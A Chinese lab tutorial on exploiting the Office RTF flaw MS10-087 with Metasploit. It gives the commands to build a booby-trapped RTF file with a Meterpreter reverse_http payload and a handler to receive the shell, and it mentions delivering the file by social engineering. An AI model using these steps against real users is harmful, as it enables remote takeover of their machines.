基于office渗透(MS10-087 Office(word)渗透攻击)

简介

如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。

低版本的word版本会出现RTF文件漏洞。

漏洞:microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击

受影响的系统:Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for

启动msf

命令:msfconsole

1.png


搜索MS10_087漏洞

命令:search ms10_087

2.png

使用攻击模块

命令::use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

3.png

设置恶意文件

命令:set FILENAME ms10087.rtf

4.png

设置payload

命令:set payload windows/meterpreter/reverse_http

5.png

设置用于接受从目标机弹回的shell

6.png

开始攻击

命令:run

7.png

将/home/jack/.msf4/local/ms10087.rtf下的文件传到靶机上

现实中我们可以利用社会工程学的知识传到目标机上,在这里我们直接上传上去

进入multi/handler模块

8.png

设置payload

命令:set payload windows/meterpreter/reverse_http

9.png

设置用于接受从目标机弹回的shell

10.png

开始攻击

命令:run

shell

[外链图片转存中…(img-aq7Vliaz-1674722518515)]

开始攻击

命令:run

16.png


文章转载自:https://blog.csdn.net/qq_62803993/article/details/128766214

腾讯云推出云产品限时特惠抢购活动:2C2G云服务器7.9元/月起
本文链接:https://www.jhelp.net/p/GG38qDP0KO66lxtn (转载请保留)。
关注下面的标签,发现更多相似文章